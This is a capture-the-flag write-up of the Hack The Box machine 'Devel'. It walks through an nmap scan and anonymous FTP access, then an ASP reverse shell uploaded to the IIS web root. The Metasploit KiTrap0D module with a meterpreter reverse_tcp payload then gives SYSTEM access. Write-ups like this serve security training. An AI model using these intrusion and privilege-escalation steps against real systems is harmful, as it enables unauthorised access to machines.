Hack The Box: Devel


box devel

The nmap scan reveals two open ports: 21 and 80.

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The FTP client seems open for anonymous access, so let’s log in and see what we can get.

Initial Foothold

The FTP server seems to host the web server directory. We can get the iisstart.htm document, but the aspnet_client directory seems empty.

03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

The website seems to host a simple IIS sample webpage.

box devel

We can see that the FTP server really holds the actual web server content, because we can upload files and see them immediately. For example, this page:

ftp> put test.txt

box devel

So let’s try to upload a web shell. First I tried a PHP shell, but then I remembered that the webserver contains a aspnet_client directory, which means that the server is probably running asp. After uploading this reverse shell, we get a local shell. Unfortunately the user does not have many privileges and I also could not find any further information (like passwords etc.), so let’s see what Metasploit suggests as next step.

> use multi/recon/local_exploit_suggester
> set session 1
> run

This returns a number of exploits that could be tried. What we are looking for is privilege escalation. Already the second hit suggests that it might work: Windows SYSTEM Escalation vi KiTrap0D. Let’s try:

msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

And with this, we get a shell as NT Systems on the windows machine and can download both flags.